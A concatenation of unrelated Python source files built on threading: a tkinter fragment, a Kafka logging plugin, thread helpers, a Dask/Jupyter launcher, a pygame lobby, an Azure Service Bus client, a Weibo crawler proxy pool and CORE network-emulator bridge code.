btn2.btn.grid(column=2, row=10) #Send Data from text box
cb0.cb.bind("<<ComboboxSelected>>", display_create) #link protocol selection combobox to ubove function. Display fields update when drop box changes.
#if dev is None:
#raise ValueError('The device is not connnected')
#messagebox.showinfo("Works", "No Device Connected")
def main():
#serialThread = threading.Thread(target=read_from_port, args=(ser,))
#serialThread.start()
window.mainloop()
if (__name__ == '__main__'):
main()
|
logger.py
|
import web
import threading
import time
import sys
from pirulo import Handler
class TopicsHandler:
def GET(self):
return Plugin.INSTANCE.topics
class ConsumersHandler:
def GET(self):
return Plugin.INSTANCE.consumers
class Plugin(Handler):
INSTANCE = None
def __init__(self):
Handler.__init__(self)
Plugin.INSTANCE = self
self.fd = open('/tmp/events', 'w')
self.topics = []
self.consumers = []
self.thread = threading.Thread(target=self.launch_server)
self.thread.start()
def handle_initialize(self):
self.subscribe_to_consumers()
self.subscribe_to_consumer_commits()
self.subscribe_to_topics()
self.subscribe_to_topic_message()
def launch_server(self):
try:
urls = (
'/topics', 'TopicsHandler',
'/consumers', 'ConsumersHandler',
)
sys.argv = []
app = web.application(urls, globals())
app.run()
except Exception as ex:
print 'Failed running server: ' + str(ex)
def log_message(self, message):
self.fd.write(message + '\n')
self.fd.flush()
def handle_new_consumer(self, group_id):
self.log_message('New consumer {0} found'.format(group_id))
self.consumers.append(group_id)
def handle_new_topic(self, topic):
self.log_message('Found topic {0}'.format(topic))
self.topics.append(topic)
def handle_consumer_commit(self, group_id, topic, partition, offset):
self.log_message('Consumer {0} committed to {1}/{2} offset {3}'.format(
group_id,
topic,
partition,
offset
))
def handle_topic_message(self, topic, partition, offset):
self.log_message('New offset for topic {0}/{1} at offset {2}'.format(
topic,
partition,
offset
))
def create_plugin():
return Plugin()
|
thread.py
|
'''
@author: frank
'''
import threading
import inspect
import pprint
import traceback
import log
import functools
logger = log.get_logger(__name__)
class AsyncThread(object):
def __init__(self, func):
self.func = func
def __get__(self, obj, type=None):
return self.__class__(self.func.__get__(obj, type))
def __call__(self, *args, **kw):
return ThreadFacade.run_in_thread(self.func, args=args, kwargs=kw)
class ThreadFacade(object):
@staticmethod
def run_in_thread(target, args=(), kwargs={}):
def safe_run(*sargs, **skwargs):
try:
target(*sargs, **skwargs)
except Exception as e:
content = traceback.format_exc()
err = '%s\n%s\nargs:%s' % (str(e), content, pprint.pformat([args, kwargs]))
logger.warn(err)
t = threading.Thread(target=safe_run, name=target.__name__, args=args, kwargs=kwargs)
t.start()
return t
class PeriodicTimer(object):
def __init__(self, interval, callback, args=[], kwargs={}, stop_on_exception=True):
self.interval = interval
self.args = args
self.kwargs = kwargs
self.stop_on_exception = stop_on_exception
@functools.wraps(callback)
def wrapper(*args, **kwargs):
result = not self.stop_on_exception
try:
result = callback(*args, **kwargs)
except Exception as e:
content = traceback.format_exc()
err = '%s\n%s\nargs:%s' % (str(e), content, pprint.pformat([args, kwargs]))
logger.warn(err)
logger.warn('this timer thread will be terminated immediately due to the exception')
if result:
self.thread = threading.Timer(self.interval, self.callback, self.args, self.kwargs)
self.thread.start()
self.callback = wrapper
@AsyncThread
def start(self):
self.thread = threading.Timer(self.interval, self.callback, self.args, self.kwargs)
self.thread.start()
def cancel(self):
self.thread.cancel()
def timer(interval, function, args=[], kwargs={}, stop_on_exception=True):
return PeriodicTimer(interval, function, args, kwargs, stop_on_exception)
class AtomicInteger(object):
def __init__(self, value=0):
self._value = value
self._lock = threading.Lock()
def inc(self):
with self._lock:
self._value += 1
return self._value
def dec(self):
with self._lock:
self._value -= 1
return self._value
def get(self):
with self._lock:
return self._value
|
startDask.py
|
import os
import argparse
import time
from dask.distributed import Client
import sys, uuid
import threading
import subprocess
import socket
import mlflow
from notebook.notebookapp import list_running_servers
def write_freeze():
# log pip list before doing anything else
from pathlib import Path
import os
Path("./outputs").mkdir(parents=True, exist_ok=True)
os.system("pip list > outputs/pip_list.txt")
def flush(proc, proc_log):
while True:
proc_out = proc.stdout.readline()
if proc_out == "" and proc.poll() is not None:
proc_log.close()
break
elif proc_out:
sys.stdout.write(proc_out)
proc_log.write(proc_out)
proc_log.flush()
if __name__ == "__main__":
write_freeze()
parser = argparse.ArgumentParser()
parser.add_argument("--jupyter_token", default=uuid.uuid1().hex)
parser.add_argument("--script")
args, unparsed = parser.parse_known_args()
for k, v in os.environ.items():
if k.startswith("MLFLOW"):
print(k, v)
MLFLOW_RUN_ID = os.getenv("MLFLOW_RUN_ID")
print("- env: MASTER_ADDR: ", os.environ.get("MASTER_ADDR"))
print("- env: MASTER_PORT: ", os.environ.get("MASTER_PORT"))
print("- env: RANK: ", os.environ.get("RANK"))
print("- env: LOCAL_RANK: ", os.environ.get("LOCAL_RANK"))
print("- env: NODE_RANK: ", os.environ.get("NODE_RANK"))
rank = os.environ.get("RANK")
ip = socket.gethostbyname(socket.gethostname())
master = os.environ.get("MASTER_ADDR")
master_port = os.environ.get("MASTER_PORT")
print("- my rank is ", rank)
print("- my ip is ", ip)
print("- master is ", master)
print("- master port is ", master_port)
scheduler = master + ":8786"
dashboard = master + ":8787"
print("- scheduler is ", scheduler)
print("- dashboard is ", dashboard)
print("args: ", args)
print("unparsed: ", unparsed)
print("- my rank is ", rank)
print("- my ip is ", ip)
if not os.path.exists("logs"):
os.makedirs("logs")
print("free disk space on /tmp")
os.system(f"df -P /tmp")
if str(rank) == "0":
mlflow.log_param("headnode", ip)
mlflow.log_param(
"cluster",
"scheduler: {scheduler}, dashboard: {dashboard}".format(
scheduler=scheduler, dashboard=dashboard
),
)
cmd = (
"jupyter lab --ip 0.0.0.0 --port 8888"
+ " --NotebookApp.token={token}"
+ " --allow-root --no-browser"
).format(token=args.jupyter_token)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
jupyter_log = open("logs/jupyter_log.txt", "w")
jupyter_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
jupyter_flush = threading.Thread(target=flush, args=(jupyter_proc, jupyter_log))
jupyter_flush.start()
# while not list(list_running_servers()):
# time.sleep(5)
# jupyter_servers = list(list_running_servers())
# assert (len(jupyter_servers) == 1), "more than one jupyter server is running"
mlflow.log_param(
"jupyter", "ip: {ip_addr}, port: {port}".format(ip_addr=ip, port="8888")
)
mlflow.log_param("jupyter-token", args.jupyter_token)
cmd = (
"dask-scheduler "
+ "--port "
+ scheduler.split(":")[1]
+ " --dashboard-address "
+ dashboard
)
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
scheduler_log = open("logs/scheduler_log.txt", "w")
scheduler_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
scheduler_flush = threading.Thread(
target=flush, args=(scheduler_proc, scheduler_log)
)
scheduler_flush.start()
cmd = "dask-worker " + scheduler
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
worker_log = open("logs/worker_{rank}_log.txt".format(rank=rank), "w")
worker_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
worker_flush = threading.Thread(target=flush, args=(worker_proc, worker_log))
worker_flush.start()
if args.script:
command_line = " ".join(["python", args.script] + unparsed)
print("Launching:", command_line)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
driver_log = open("logs/driver_log.txt", "w")
driver_proc = subprocess.Popen(
command_line.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
driver_flush = threading.Thread(
target=flush, args=(driver_proc, driver_log)
)
driver_flush.start()
# Wait until process terminates (without using p.wait())
# while driver_proc.poll() is None:
# # Process hasn't exited yet, let's wait some
# time.sleep(0.5)
print("waiting for driver process to terminate")
driver_proc.wait()
exit_code = driver_proc.returncode
print("process ended with code", exit_code)
print("killing scheduler, worker and jupyter")
jupyter_proc.kill()
scheduler_proc.kill()
worker_proc.kill()
exit(exit_code)
else:
flush(scheduler_proc, scheduler_log)
else:
cmd = "dask-worker " + scheduler
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
worker_log = open("logs/worker_{rank}_log.txt".format(rank=rank), "w")
worker_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
flush(worker_proc, worker_log)
|
Matchup.py
|
"""
Author: George Macrae
2014
"""
import pygame, pygbutton, sys
from pygame.locals import *
from socket import *
import threading
import Start
import textbox
import Setup
FPS = 30
WINDOWWIDTH = 860
WINDOWHEIGHT = 700
WHITE = (255, 255, 255)
RED = (255, 0, 0)
BLUE = (0, 0, 255)
GREEN = (0, 255, 0)
BLACK = (0, 0, 0, 0.8)
DARKGRAY = (20,20,20)
GRAY = (70,70,70)
FONT = pygame.font.SysFont("Arial", 14)
TITLEFONT = pygame.font.SysFont("Arial", 20)
HEADFONT = pygame.font.SysFont("Arial", 34)
global username
username = ""
def drawChallengePanels(screen):
screen.blit(pygame.image.load('images/matchupbg.png').convert_alpha(),(0,0))
label = HEADFONT.render('Welcome, '+ username, 1, (255,255,255))
screen.blit(label, (300, 20))
screen.blit(pygame.image.load('images/matchupoverlay.png').convert_alpha(),(20,100))
pygame.draw.rect(screen, DARKGRAY, [20, 100, 400, 30])
screen.blit(TITLEFONT.render("ONLINE: ", 1, WHITE),(180,105))
screen.blit(pygame.image.load('images/matchupoverlay1.png').convert_alpha(),(440,100))
pygame.draw.rect(screen, DARKGRAY, [440, 100, 400, 30])
screen.blit(TITLEFONT.render("CHALLENGES: ", 1, WHITE),(570,105))
def listener(clientsocket,SCREEN):
global buttonlist
global challengelist
global opp
global user
global Set_up
people_list = []
user = 'null'
print 'listening '
while True:
data = clientsocket.recv(1024)
print 'data rec = '+data
if data == 'Signout':
break
elif data == 'Setup':
Set_up = True
break
dataList = data.split(':')
if len(dataList) > 1:
if dataList[1] == 'CHALLENGED':
challenger = dataList[2]
print 'challenger '+str(challenger)
if challenger not in challengelist:
challengelist.append(challenger)
print 'challenge list '+str(challengelist)
elif dataList[1] == 'ACCEPTED':
print 'CHALLENGE ACCEPTED FROM '+str(dataList[2])
opp = dataList[2]
clientsocket.send('SetupA')
Set_up = True
break
else:
people_list = []
people = str(data)[1:-1]
temp_people_list = people.split(", ")
print 'people'+people
if user == 'null':
user = temp_people_list[-1]
if user == '\'\'':
import string
import random
user = ''.join(random.choice(string.lowercase) for x in range(5))
print user
for x in temp_people_list:
if x != user:
people_list.append(x)
for y in challengelist:
if y not in temp_people_list:
challengelist.remove(y)
print 'people list'+str(people_list)
print 'user '+str(user)
buttonlist = setOnlineDisplay(SCREEN,people_list,clientsocket,buttonlist,challengelist)
def setOnlineDisplay(SCREEN, people_list, clientsocket,buttonList,challengelist):
print "update screen"
drawChallengePanels(SCREEN)
buttonExit = pygbutton.PygButton((WINDOWWIDTH/2-60, 630, 120, 30), 'Log Out')
buttonExit.draw(SCREEN)
x = 150
buttonList = []
for y in people_list :
SCREEN.blit(pygame.image.load('images/matchupnamebg.png').convert_alpha(),(20,x-20))
l = str(y)[1:-1].split(';')
print "Y STRING " +y
person = FONT.render(l[0],1,GREEN)
SCREEN.blit(person,(40,x))
wins = FONT.render("Wins: "+str(l[2]), 1, WHITE)
loss = FONT.render("Losses: " + str(l[4]), 1, WHITE)
SCREEN.blit(wins,(40, x+20))
SCREEN.blit(loss,(110, x+20))
button = pygbutton.PygButton((300,x+5,100,30), "challenge")
button.draw(SCREEN)
buttonList.append((button,str(y)))
x = x + 80
x = 150
for c in challengelist:
SCREEN.blit(pygame.image.load('images/matchupnamebg.png').convert_alpha(),(440,x-20))
ch = 'chal'+str(c)
l = c.split(';')
msg = str(l[0]) + " has sent you a challenge!"
SCREEN.blit(FONT.render(msg,1,(255,255,255)),(460,x+10))
button = pygbutton.PygButton((720,x+5,100,30), "accept")
button.draw(SCREEN)
buttonList.append((button,ch))
x = x + 80
pygame.display.update()
return buttonList
def start(clientsocket,un):
global username
username = un
print 'Matchup'
global SCREEN
SCREEN = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))
pygame.display.set_caption("Match up")
drawChallengePanels(SCREEN)
buttonExit = pygbutton.PygButton((WINDOWWIDTH/2-60, 630, 120, 30), 'Log Out')
buttonExit.draw(SCREEN)
pygame.display.update()
clientsocket.send('Matchup:'+un)
print 'T1 '+ str(threading.activeCount())
l_thread = threading.Thread(target = listener, args = (clientsocket,SCREEN))
global opp
global buttonlist
global challengelist
global user
global Set_up
user = 'null'
challengelist = []
buttonlist = []
l_thread.start()
Set_up = False
print 'T2 '+ str(threading.activeCount())
while True :
# drawChallengePanels(SCREEN)
# buttonExit.draw(SCREEN)
if Set_up == True:
Setup.start(clientsocket,opp,user,username)
break
for event in pygame.event.get():
if 'click' in buttonExit.handleEvent(event):
clientsocket.send("Signed Out:"+str(username))
# May need to lock
clientsocket.close()
print 'Back-matchup'
Start.main()
break
if not buttonlist:
continue
for x in buttonlist:
req = x[1]
if 'click' in x[0].handleEvent(event):
# button press to accept challenge
if req[0:4] == 'chal':
clientsocket.send("Accept:"+req[4:])
clientsocket.send("SetupC")
opp = req[4:]
else:
# button press to send challenge
clientsocket.send("Challenge:"+x[1])
|
client.py
|
"""
Receieves notifications from remote queue.
"""
# pylint:disable=W0212
# pylint:disable=W0703
import threading
import logging
import json
from azure.servicebus import ServiceBusService
MESSAGE_WAIT_AFTER_ERROR = 5
MESSAGE_WAIT_TIMEOUT = 5
SBS_TOPIC_NAME = "webhooks"
SBS_SUBSCRIPTION_NAME = "RPiOneSubscription"
SBS_KEY_NAME = "ListenFromTopic"
class Client(object):
"""Client for ServiceBusService"""
def __init__(self, sbs_namespace, sbs_access_key):
if not sbs_namespace:
raise ValueError("'sbs_namespace' is required")
if not sbs_access_key:
raise ValueError("'sbs_access_key' is required")
self._logger = logging.getLogger(__name__)
self._sbs = ServiceBusService(service_namespace=sbs_namespace,
shared_access_key_name=SBS_KEY_NAME,
shared_access_key_value=sbs_access_key)
self._stop_event = None
self._thread = None
self._last_sequence = None
def start(self):
"""starts subscription"""
if not self._thread is None:
raise Exception("Client already started")
self._logger.info("Starting client for host %s", self._sbs._get_host())
self._stop_event = threading.Event()
self._thread = threading.Thread(target=self._receive_messages)
self._thread.daemon = True
self._thread.start()
def stop(self):
"""stops subscription"""
if self._thread is None:
raise Exception("Client is not started")
self._logger.info("Stopping client. May take up to %d seconds", MESSAGE_WAIT_TIMEOUT)
self._stop_event.set()
self._thread.join()
self._thread = None
self._stop_event = None
self._logger.info("Client stopped")
def _receive_messages(self):
"""Receieves messages from service"""
while not self._stop_event.is_set():
try:
message = self._sbs.receive_subscription_message(SBS_TOPIC_NAME,
SBS_SUBSCRIPTION_NAME,
timeout=MESSAGE_WAIT_TIMEOUT,
peek_lock=False)
except Exception:
self._logger.exception("Error while pulling message from topic")
self._stop_event.wait(MESSAGE_WAIT_AFTER_ERROR)
continue
if message is None or message.body is None:
self._logger.debug("No message received after waiting %d seconds",
MESSAGE_WAIT_TIMEOUT)
else:
sequence = message.broker_properties[u'SequenceNumber']
sent_on = message.broker_properties[u'EnqueuedTimeUtc']
body = message.body
self._logger.info("Message with sequence '%s' sent on '%s' receieved: %s",
sequence, sent_on, body)
if self._last_sequence > sequence:
self._logger.warning("Skipping message with sequence '%s' because the later"\
" one with sequence '%s' was already processed",
sequence, self._last_sequence)
else:
self._last_sequence = sequence
try:
self._process_message(body)
except Exception:
self._logger.exception("Failed to process a message")
def _process_message(self, message_body):
"""Process single message"""
parsed_message = json.loads(message_body)
msg_sender = parsed_message[u'name']
msg_text = parsed_message[u'text']
msg_type = parsed_message[u'type']
if not msg_sender or not msg_text or not msg_type:
raise ValueError("One of requried parameters is missing")
|
proxy.py
|
import requests
import time
import random
import sys
from multiprocessing import Process, Manager, current_process
sys.path.append('..') # For unit test
from logger import crawler
from config import headers, conf
from login import get_cookies
from page_parse.basic import is_404
from db.redis_db import Cookies
DAXIANG_URL = 'http://tvp.daxiangdaili.com/ip/?tid={}&num={}&delay=2&category=2&longlife=5'
MOGU_URL = 'http://piping.mogumiao.com/proxy/api/get_ip_bs?appKey={key}&count={num}&expiryDate=5&format=2'
TEST_URL = 'http://help.weibo.com/ask' # Weibo Help page
BASE_URL = 'http://weibo.com/p/{}{}/info?mod=pedit_more'
COOKIES = get_cookies()
class Proxy():
def __init__(self):
self.manager = Manager()
self.PROXY_IP = self.manager.dict()
self.Cache = self.manager.Queue()
self.Flag = self.manager.Value('i', 0)
ip_list = self.request_ip(10)
for i in ip_list:
self.Cache.put(i)
def make_proxy_head(self, proc_name):
if proc_name in self.PROXY_IP:
return self.make_proxy_head_with_ip(self.PROXY_IP[proc_name])
@classmethod
def is_ip_port(cls, ip):
ip = ip.strip()
return ip and ip.count('.') is 3 and ip.count(':') is 1
# Valid ip list will be returned if non_stop==True otherwise this function will stop after one request
@classmethod
def request_ip(cls, num, non_stop=True):
url = MOGU_URL.format(key=conf.moguproxy_order(), num=num)
try:
resp = requests.get(url)
except:
if non_stop:
crawler.error('Can not get proxy ip, Please check the account')
time.sleep(cls.get_proxy_sleep_time())
return cls.request_ip(num)
else:
return []
if resp.status_code is not 200:
if non_stop:
crawler.error('Can not get proxy ip, Please check the account')
time.sleep(cls.get_proxy_sleep_time())
return cls.request_ip(num)
else:
return []
cand_ip = resp.content.decode().split()
cand_ip = [i for i in cand_ip if cls.is_ip_port(i)]
if len(cand_ip) is 0:
if non_stop:
sleep_time = cls.get_proxy_sleep_time()
crawler.warning('Proxy is empty, try after {}, Return from server: {}'.format(sleep_time,
resp.content.decode()))
time.sleep(sleep_time)
return cls.request_ip(num)
else:
return []
return cand_ip
@classmethod
def make_proxy_head_with_ip(cls, ip):
return {'http': 'http://' + ip}
@classmethod
def get_proxy_sleep_time(cls):
return random.randint(conf.get_proxy_ip_min_req_interal(), conf.get_proxy_ip_max_req_interal())
@classmethod
def check_weibo_help_page(cls, resp):
return resp.status_code == 200 and '微博帮助' in resp.content.decode()
@classmethod
def check_ip(cls, ip):
if '.' not in ip:
crawler.info('Ignore non ip {}'.format(ip))
return False
crawler.info('Checking {}'.format(ip))
count = 0
while count < conf.get_proxy_max_retries():
crawler.info('Check count {}'.format(count))
try:
resp = requests.get(TEST_URL, headers=headers,
timeout=conf.get_proxy_speed_filter(),
proxies=cls.make_proxy_head_with_ip(ip),
verify=False)
if cls.check_weibo_help_page(resp):
crawler.info('{} is available'.format(ip))
return True
except Exception as excep:
crawler.debug('Exceptions are raised when filtering {}.Here are details:{}'.format(ip, excep))
count += 1
time.sleep(0.2)
crawler.info('Http proxy: ' + ip + ' is filtered out')
return False
def pick_ip_from_list(self, ip_list):
res = ''
for ip in ip_list:
if res is '' and self.check_ip(ip):
res = ip
else:
self.Cache.put(ip)
return res
def pick_ip_from_cache(self):
try:
if self.Cache.empty():
return ''
ip = self.Cache.get()
if ip and self.check_ip(ip):
return ip
else:
return ''
except Exception as exc:
crawler.info('Fail to get from Cache, message returned is {}'.format(exc))
return ''
def is_proc_set(self, proc_name):
return proc_name in self.PROXY_IP and self.PROXY_IP[proc_name] is not ''
def get_ip(self, proc_name):
if proc_name in self.PROXY_IP:
return self.PROXY_IP[proc_name]
else:
return ''
def set_ip_for_proc(self, proc_name, ip):
self.PROXY_IP[proc_name] = ip
def update_ip(self, proc_name):
ip = self.pick_ip_from_cache()
if ip is '':
if self.Flag is 1:
time.sleep(self.get_proxy_sleep_time())
self.update_ip(proc_name)
return
self.Flag = 1 # manual lock to slow down the request
cand_ip = self.request_ip(conf.get_proxy_ip_per_request(), non_stop=False)
time.sleep(2) # slow down the request
self.Flag = 0
if len(cand_ip) is 0:
time.sleep(self.get_proxy_sleep_time())
self.update_ip(proc_name)
return
ip = self.pick_ip_from_list(cand_ip)
if ip is '':
self.update_ip(proc_name)
return
crawler.info('find one from list {}'.format(ip))
else:
crawler.info('find one from queue {}'.format(ip))
self.set_ip_for_proc(proc_name, ip)
if __name__ == '__main__':
#test = requests.get(TEST_URL, proxies=Proxy.make_proxy_head_with_ip('123.160.34.35:41854'), headers=headers)
#print (test.status_code)
#sys.exit(0)
proxy = Proxy()
m = Manager()
IP = m.list()
print(TEST_URL)
ip_count = 2
print('ip_count', ip_count)
def foo():
global proxy
proxy.update_ip(current_process().name)
global IP
IP.append(proxy.get_ip(current_process().name))
print('IP: {}'.format(IP))
for i in range(ip_count):
print(i)
p = Process(target=foo)
p.start()
p.join()
try:
for i in IP:
print('get_proxies: ', Proxy.make_proxy_head_with_ip(i))
url = BASE_URL.format('100505', '1197219380')
#html = get_page(url, auth_level=1, need_proxy=True)
resp = requests.get(url, headers=headers, cookies=COOKIES, proxies=Proxy.make_proxy_head_with_ip(i),
verify=False)
if resp.text:
page = resp.text.encode('utf-8', 'ignore').decode('utf-8')
if not resp.text or resp.status_code == 414:
print('Invalid IP: ', i)
elif is_404(page):
print('IP 404: ', i)
#resq = requests.get(TEST_URL, proxies=Proxy.make_proxy_head_with_ip(i), headers=headers)
print(resp.status_code)
except Exception as e:
print(e)
pass
|
network.py
|
"""
Defines network nodes used within core.
"""
import logging
import threading
from collections import OrderedDict
from pathlib import Path
from queue import Queue
from typing import TYPE_CHECKING, Dict, List, Optional, Type
import netaddr
from core import utils
from core.emulator.data import InterfaceData, LinkData
from core.emulator.enumerations import (
LinkTypes,
MessageFlags,
NetworkPolicy,
NodeTypes,
RegisterTlvs,
)
from core.errors import CoreCommandError, CoreError
from core.executables import NFTABLES
from core.nodes.base import CoreNetworkBase
from core.nodes.interface import CoreInterface, GreTap, Veth
from core.nodes.netclient import get_net_client
logger = logging.getLogger(__name__)
if TYPE_CHECKING:
from core.emulator.distributed import DistributedServer
from core.emulator.session import Session
from core.location.mobility import WirelessModel, WayPointMobility
WirelessModelType = Type[WirelessModel]
LEARNING_DISABLED: int = 0
class SetQueue(Queue):
"""
Set backed queue to avoid duplicate submissions.
"""
def _init(self, maxsize):
self.queue: OrderedDict = OrderedDict()
def _put(self, item):
self.queue[item] = None
def _get(self):
key, _ = self.queue.popitem(last=False)
return key
class NftablesQueue:
"""
Helper class for queuing up nftables commands into rate-limited
atomic commits. This improves performance and reliability when there are
many WLAN link updates.
"""
# update rate is every 300ms
rate: float = 0.3
atomic_file: str = "/tmp/pycore.nftables.atomic"
chain: str = "forward"
def __init__(self) -> None:
"""
Initialize the helper class, but don't start the update thread
until a WLAN is instantiated.
"""
self.running: bool = False
self.run_thread: Optional[threading.Thread] = None
# this lock protects cmds and updates lists
self.lock: threading.Lock = threading.Lock()
# list of pending nftables commands
self.cmds: List[str] = []
# list of WLANs requiring update
self.updates: SetQueue = SetQueue()
def start(self) -> None:
"""
Start thread to listen for updates for the provided network.
:return: nothing
"""
with self.lock:
if not self.running:
self.running = True
self.run_thread = threading.Thread(target=self.run, daemon=True)
self.run_thread.start()
def stop(self) -> None:
"""
Stop updates for network, when no networks remain, stop update thread.
:return: nothing
"""
with self.lock:
if self.running:
self.running = False
self.updates.put(None)
self.run_thread.join()
self.run_thread = None
def run(self) -> None:
"""
Thread target that looks for networks needing update, and
rate limits the amount of nftables activity. Only one userspace program
should use nftables at any given time, or results can be unpredictable.
:return: nothing
"""
while self.running:
net = self.updates.get()
if net is None:
break
self.build_cmds(net)
self.commit(net)
def commit(self, net: "CoreNetwork") -> None:
"""
Commit changes to nftables for the provided network.
:param net: network to commit nftables changes
:return: nothing
"""
if not self.cmds:
return
# write out nft commands to file
for cmd in self.cmds:
net.host_cmd(f"echo {cmd} >> {self.atomic_file}", shell=True)
# read file as atomic change
net.host_cmd(f"{NFTABLES} -f {self.atomic_file}")
# remove file
net.host_cmd(f"rm -f {self.atomic_file}")
self.cmds.clear()
def update(self, net: "CoreNetwork") -> None:
"""
Flag this network has an update, so the nftables chain will be rebuilt.
:param net: wlan network
:return: nothing
"""
self.updates.put(net)
def delete_table(self, net: "CoreNetwork") -> None:
"""
Delete nftable bridge rule table.
:param net: network to delete table for
:return: nothing
"""
with self.lock:
net.host_cmd(f"{NFTABLES} delete table bridge {net.brname}")
def build_cmds(self, net: "CoreNetwork") -> None:
"""
Inspect linked nodes for a network, and rebuild the nftables chain commands.
:param net: network to build commands for
:return: nothing
"""
with net.linked_lock:
if net.has_nftables_chain:
self.cmds.append(f"flush table bridge {net.brname}")
else:
net.has_nftables_chain = True
policy = net.policy.value.lower()
self.cmds.append(f"add table bridge {net.brname}")
self.cmds.append(
f"add chain bridge {net.brname} {self.chain} {{type filter hook "
f"forward priority -1\\; policy {policy}\\;}}"
)
# add default rule to accept all traffic not for this bridge
self.cmds.append(
f"add rule bridge {net.brname} {self.chain} "
f"ibriport != {net.brname} accept"
)
# rebuild the chain
for iface1, v in net.linked.items():
for iface2, linked in v.items():
policy = None
if net.policy == NetworkPolicy.DROP and linked:
policy = "accept"
elif net.policy == NetworkPolicy.ACCEPT and not linked:
policy = "drop"
if policy:
self.cmds.append(
f"add rule bridge {net.brname} {self.chain} "
f"iif {iface1.localname} oif {iface2.localname} "
f"{policy}"
)
self.cmds.append(
f"add rule bridge {net.brname} {self.chain} "
f"oif {iface1.localname} iif {iface2.localname} "
f"{policy}"
)
# a global object because all networks share the same queue
# cannot have multiple threads invoking the nftables commnd
nft_queue: NftablesQueue = NftablesQueue()
class CoreNetwork(CoreNetworkBase):
"""
Provides linux bridge network functionality for core nodes.
"""
policy: NetworkPolicy = NetworkPolicy.DROP
def __init__(
self,
session: "Session",
_id: int = None,
name: str = None,
server: "DistributedServer" = None,
policy: NetworkPolicy = None,
) -> None:
"""
Creates a LxBrNet instance.
:param session: core session instance
:param _id: object id
:param name: object name
:param server: remote server node
will run on, default is None for localhost
:param policy: network policy
"""
super().__init__(session, _id, name, server)
if name is None:
name = str(self.id)
if policy is not None:
self.policy: NetworkPolicy = policy
self.name: Optional[str] = name
sessionid = self.session.short_session_id()
self.brname: str = f"b.{self.id}.{sessionid}"
self.has_nftables_chain: bool = False
def host_cmd(
self,
args: str,
env: Dict[str, str] = None,
cwd: Path = None,
wait: bool = True,
shell: bool = False,
) -> str:
"""
Runs a command that is used to configure and setup the network on the host
system and all configured distributed servers.
:param args: command to run
:param env: environment to run command with
:param cwd: directory to run command in
:param wait: True to wait for status, False otherwise
:param shell: True to use shell, False otherwise
:return: combined stdout and stderr
:raises CoreCommandError: when a non-zero exit status occurs
"""
logger.debug("network node(%s) cmd", self.name)
output = utils.cmd(args, env, cwd, wait, shell)
self.session.distributed.execute(lambda x: x.remote_cmd(args, env, cwd, wait))
return output
def startup(self) -> None:
"""
Linux bridge startup logic.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
self.net_client.create_bridge(self.brname)
if self.mtu > 0:
self.net_client.set_mtu(self.brname, self.mtu)
self.has_nftables_chain = False
self.up = True
nft_queue.start()
def shutdown(self) -> None:
"""
Linux bridge shutdown logic.
:return: nothing
"""
if not self.up:
return
nft_queue.stop()
try:
self.net_client.delete_bridge(self.brname)
if self.has_nftables_chain:
nft_queue.delete_table(self)
except CoreCommandError:
logging.exception("error during shutdown")
# removes veth pairs used for bridge-to-bridge connections
for iface in self.get_ifaces():
iface.shutdown()
self.ifaces.clear()
self.linked.clear()
self.up = False
def attach(self, iface: CoreInterface) -> None:
"""
Attach a network interface.
:param iface: network interface to attach
:return: nothing
"""
if self.up:
iface.net_client.set_iface_master(self.brname, iface.localname)
super().attach(iface)
def detach(self, iface: CoreInterface) -> None:
"""
Detach a network interface.
:param iface: network interface to detach
:return: nothing
"""
if self.up:
iface.net_client.delete_iface(self.brname, iface.localname)
super().detach(iface)
def is_linked(self, iface1: CoreInterface, iface2: CoreInterface) -> bool:
"""
Determine if the provided network interfaces are linked.
:param iface1: interface one
:param iface2: interface two
:return: True if interfaces are linked, False otherwise
"""
# check if the network interfaces are attached to this network
if self.ifaces[iface1.net_id] != iface1:
raise ValueError(f"inconsistency for interface {iface1.name}")
if self.ifaces[iface2.net_id] != iface2:
raise ValueError(f"inconsistency for interface {iface2.name}")
try:
linked = self.linked[iface1][iface2]
except KeyError:
if self.policy == NetworkPolicy.ACCEPT:
linked = True
elif self.policy == NetworkPolicy.DROP:
linked = False
else:
raise Exception(f"unknown policy: {self.policy.value}")
self.linked[iface1][iface2] = linked
return linked
def unlink(self, iface1: CoreInterface, iface2: CoreInterface) -> None:
"""
Unlink two interfaces, resulting in adding or removing filtering rules.
:param iface1: interface one
:param iface2: interface two
:return: nothing
"""
with self.linked_lock:
if not self.is_linked(iface1, iface2):
return
self.linked[iface1][iface2] = False
nft_queue.update(self)
def link(self, iface1: CoreInterface, iface2: CoreInterface) -> None:
"""
Link two interfaces together, resulting in adding or removing
filtering rules.
:param iface1: interface one
:param iface2: interface two
:return: nothing
"""
with self.linked_lock:
if self.is_linked(iface1, iface2):
return
self.linked[iface1][iface2] = True
nft_queue.update(self)
def linknet(self, net: CoreNetworkBase) -> CoreInterface:
"""
Link this bridge with another by creating a veth pair and installing
each device into each bridge.
:param net: network to link with
:return: created interface
"""
sessionid = self.session.short_session_id()
try:
_id = f"{self.id:x}"
except TypeError:
_id = str(self.id)
try:
net_id = f"{net.id:x}"
except TypeError:
net_id = str(net.id)
localname = f"veth{_id}.{net_id}.{sessionid}"
name = f"veth{net_id}.{_id}.{sessionid}"
iface = Veth(self.session, name, localname)
if self.up:
iface.startup()
self.attach(iface)
if net.up and net.brname:
iface.net_client.set_iface_master(net.brname, iface.name)
i = net.next_iface_id()
net.ifaces[i] = iface
with net.linked_lock:
net.linked[iface] = {}
iface.net = self
iface.othernet = net
return iface
def get_linked_iface(self, net: CoreNetworkBase) -> Optional[CoreInterface]:
"""
Return the interface of that links this net with another net
